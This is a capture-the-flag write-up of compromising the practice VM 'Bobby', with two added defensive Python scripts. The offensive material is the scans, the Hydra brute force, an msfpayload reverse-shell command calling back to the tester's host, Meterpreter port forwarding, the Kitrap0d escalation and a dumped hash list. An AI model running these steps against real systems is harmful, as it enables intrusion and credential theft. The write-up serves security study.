Hi there,
Quick blog post on the VM “Bobby”, which is one of the nicest VMs I have done so far.
Discovery
The first step is always the same: discovering the machine on the network. To do so:
$ nmap -sV 192.168.1.1/24
I managed to retrieve the IP address: 192.168.1.11.
Let’s fingerprint the different services in order to exploit it.
Fingerprinting
Then, I used Nmap to retrieve the services running:
$ nmap -sV 192.168.1.11
Starting Nmap 6.46 ( http://nmap.org ) at 2014-05-15 20:54 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 5.1
443/tcp closed https
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
Using Nikto as well:
$ ./nikto.pl -h http://192.168.1.11
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2014-05-15 20:56:29 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ Server leaks inodes via ETags, header found with file /, fields: 0x20b456b8599ce1:a02
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2014-05-15 20:56:50 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The page localstart.asp was asking for some credentials, but unfortunately I didn’t have them.
I also used DirBuster but I couldn’t find any relevant files or directories.
I decided to target the FTP server. I checked whether anonymous access was enabled on the FTP server, but unfortunately there was none.
Based on the web application, I decided to create a custom wordlist, because I didn’t have any clue about what kind of password it could be.
I used the awesome tool Wyd, which extracts single words/strings from files.
To do so:
wget http://192.168.1.11 -O bobby.html
And then :
./wyd.pl -o bobby.txt bobby.html
The output is:
TheXero-01
Bobby's
blog
Welcome
to
my
personal
blogging
website
but
here
are
a
few
things
about
me
Favourite
film
Matrix
reloaded
music
artist
Daft
Punk
os
Windows
31
bobby
Moreover, I didn’t have any clue about the username either, but thanks to the information we retrieved, I thought the username was something like:
Bobby
BOBBY
BOB
BoB
Bob
bob
BOb
...
After cracking it using Hydra, I was able to log in with the credentials Bob/Matrix. Yay!
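The weakness exploited above is that the password was a word printed on the victim's own home page. As an added example (not part of the original write-up, and not the Wyd tool itself), here is the same word-extraction idea turned into a defensive password-policy check: it pulls the visible words out of an HTML page, ignoring script and style content, and rejects any candidate password that contains one of them. The sample HTML is constructed to mimic the blog text above.

```python
import re
from html.parser import HTMLParser

# Constructed sample page mimicking the blog's visible text (not the real bobby.html).
SAMPLE_HTML = """<html><head><title>Bobby's blog</title>
<style>body{font:12px}</style></head>
<body><h1>Welcome to my personal blogging website</h1>
<p>but here are a few things about me</p>
<ul><li>Favourite film: Matrix reloaded</li>
<li>music artist: Daft Punk</li><li>os: Windows</li></ul>
<script>var ignored = "ignored";</script></body></html>"""


class _TextCollector(HTMLParser):
    """Collects visible text, skipping everything inside <script> and <style>."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html):
    """Return the distinct words in the page's visible text (what Wyd would list)."""
    parser = _TextCollector()
    parser.feed(html)
    text = " ".join(parser.chunks)
    return {w for w in re.findall(r"[A-Za-z0-9']+", text) if len(w) > 1}


def password_derived_from_page(password, html, min_len=4):
    """True if the candidate password contains any page word of min_len+ characters,
    ignoring case, so 'Matrix' and 'matrix2014' are both rejected."""
    lowered = password.lower()
    words = {w.lower() for w in extract_words(html) if len(w) >= min_len}
    return any(w in lowered for w in words)
```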
ftp> o
(to) 192.168.1.11
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:paul): Bob
331 Password required for Bob.
Password:
230 User Bob logged in.
Remote system type is Windows_NT.
ftp>
Thanks to this access, I found a file called hint.html:
*#1 This very common Windows file is not downloaded or interpreted but rather executed server side *
Exploitation
My plan now was to create a reverse Meterpreter backdoor, upload it, and execute it by browsing to the page http://192.168.1.11/backdoor.exe
I created the payload using msfpayload:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > /tmp/backdoor.exe
Then, I uploaded the backdoor, had a listener on port 4444 and got a Meterpreter session. Good!
However, the Meterpreter session stopped a few minutes later because of some timeout with the web application. I decided to:
- Re-execute the backdoor by accessing the file through the web server
- Then, after getting the Meterpreter session, execute it again:
execute -f backdoor.exe
- Go into the background, and restart a handler.
You need to do it fast enough to catch the connection. Otherwise, you’ll wait, and wait...
Then, I got this second Meterpreter session and I was sure this one would not terminate because of some timeout. It was time to get SYSTEM privileges!
Getting SYSTEM
The first attempt was to use getsystem, but unfortunately I didn’t have enough privileges. I couldn’t migrate to another process either.
So, I decided to have a look at all the processes and services running on localhost which were not accessible from the outside. That’s where I found the Terminal Server.
I decided to add some route:
route add 127.0.0.1 255.255.255.0 2
I added a route that allowed me to target the remote machine with the IP 127.0.0.1. The traffic was tunneled through the Meterpreter session. Nice trick, I like it.
Then, I port-forwarded the Terminal Server port, 3389. I did it like this:
portfwd add -l 3389 -p 3389 -r 127.0.0.1
That allowed me to target the local port 3389 and forward the whole traffic to the remote port 3389. Another nice trick I like in Meterpreter.
Thanks to this, I was able to use rdesktop and log in with Bob’s account (using the password Matrix). Then, I executed the backdoor again to get a proper user running the process.
I managed to retrieve another Meterpreter session. I tried the getsystem command again, but no luck.
However, I remembered an exploit called Kitrap0d.
I checked if it was still in Metasploit (I remembered it was another method in getsystem) and I was able to use it. I linked it to my Meterpreter session and “Voilà!”, I got SYSTEM privileges. :-)
The metasploit module is: exploit/windows/local/ms10_015_kitrap0d.
Then, I was able to dump hashes from the system:
Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:887f24b0020b273cb90fe7c65f15ca55:c9ee87d435cfd6b9b824e7476e87ee23:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:904376a878474e83e38973eb591a30bf:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
IUSR_BOBBY:1004:cd15c852291896b9bcb0b504caf52a34:290a598ad6db348292cd06eeda96a626:::
IWAM_BOBBY:1005:2b726cbf313f69b4617d49f3866beaad:1dddcc00ab4bcbe9e21b767f8a9a4d9e:::
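A defender reading a dump like this can learn a lot before any cracking happens. As an added example (not part of the original write-up), the script below parses pwdump-format lines and flags what matters: an NT hash equal to the empty-password constant means a blank password; an LM hash that is not the empty constant means the weak LM hash is still being stored; and because LM hashes each 7-character half separately, a second half equal to the empty-half constant reveals a password of 7 characters or fewer (bob's "Matrix" is 6). The sample lines are the write-up's Administrator, Guest and bob entries plus one constructed account.

```python
# pwdump format: user:RID:LM hash:NT hash::: (each hash is 32 hex characters)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_LM_HALF = "aad3b435b51404ee"              # LM hash of one empty 7-char half
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Three lines as dumped in the write-up plus one constructed entry (svc_nolm)
# showing what an account looks like once LM hash storage is disabled.
SAMPLE_DUMP = """\
Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
svc_nolm:1100:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; blank lines and '#' comments are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError("malformed pwdump line: %r" % line)
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def audit_entry(entry):
    """Return the list of findings for one account, in a fixed order."""
    findings = []
    if entry["nt"] == EMPTY_NT:
        findings.append("blank-password")
    if entry["lm"] != EMPTY_LM:
        # LM stored: password is <= 14 chars, case-folded, crackable half by half
        findings.append("lm-hash-stored")
        if entry["lm"][16:] == EMPTY_LM_HALF:
            findings.append("password-at-most-7-chars")
    return findings


def audit_dump(text):
    """Map each user name to its findings; an empty list means nothing flagged."""
    return {e["user"]: audit_entry(e) for e in parse_pwdump(text)}
```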
And then, I cracked the passwords (for fun) using John the Ripper; the Administrator’s password was P@SSW0RD12345.
I hope you liked the write-up, which contains (in my opinion) fun tricks such as adding a route, doing port forwarding, etc. Cheers and see you soon!